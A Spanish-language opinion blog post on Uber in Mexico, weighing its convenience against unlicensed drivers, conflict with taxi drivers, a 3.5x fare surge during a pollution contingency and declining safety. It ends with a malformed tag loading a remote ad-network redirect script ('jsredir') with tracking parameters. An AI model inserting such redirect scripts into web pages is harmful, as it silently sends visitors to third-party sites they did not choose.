Uber México: amigo o rival

Desde la entrada de Uber a México, se han escuchado muchos comentarios positivos respecto a los buenos servicios que esta aplicación ofrece, sin embargo, también ha sonado con mucha fuerza la mala reputación que esta empresa norteamericana tiene.

Fundada por Garrett Camp y Travis Kalanick, Uber es una compañía creada en San Francisco, California que sin lugar a duda ha revolucionado la movilidad de las personas alrededor del mundo.

Así como muchos otros países, México también ha decidido cambiar los paradigmas el transporte público y es por ello que con tan pocos años de vida, uber ha logrado tener, nada más en la ciudad de México, una cantidad de usuarios que ya asciende a los 500,000.

Se debe reconocer que Uber ha innovado la forma en la que viajan sus clientes, ya que ofrecen un   buen trato por parte de los conductores, servicios de agua, música, aire acondicionado y la posibilidad de no manejar dinero en efectivo.

Pero también existen ciertas desventajas que ponen en riesgo la seguridad y confianza del cliente.

Una de las principales problemáticas que existió con la entrada de uber, es que mucho taxistas estaban en total desacuerdo con la forma de operar de la empresa,  ya que muchos de los conductores que nos han transportado no han acreditado una licencia de transporte público individual (taxi) para laborar como tal y que de cierta manera Uber “robaba” muchos clientes de los sitios de taxis.

Por mencionar otro caso, recordemos que en los meses que se puso en práctica el Hoy no circula por contingencia, Uber excedió las tarifas hasta un 3.5 de los costos normales. Esta situación molestó mucho a los consumidores y Uber se vio obligado a compensar a los usuarios afectados.

Esta aplicación nos ha ayudado en muchas situaciones al ofrecernos un servicio de transporte seguro y accesible, pero a su vez también nos ha elevado de forma dramática sus precios y la seguridad que al principio nos ofrecía ahora deja mucho que desear, pero tú, consumidor, tiene la última palabra.

< src="https://restwp.mobidea.com/jsredir?v=1&sl=312182-3f487&redirect_option=1&data1=Track1&data2=Track2">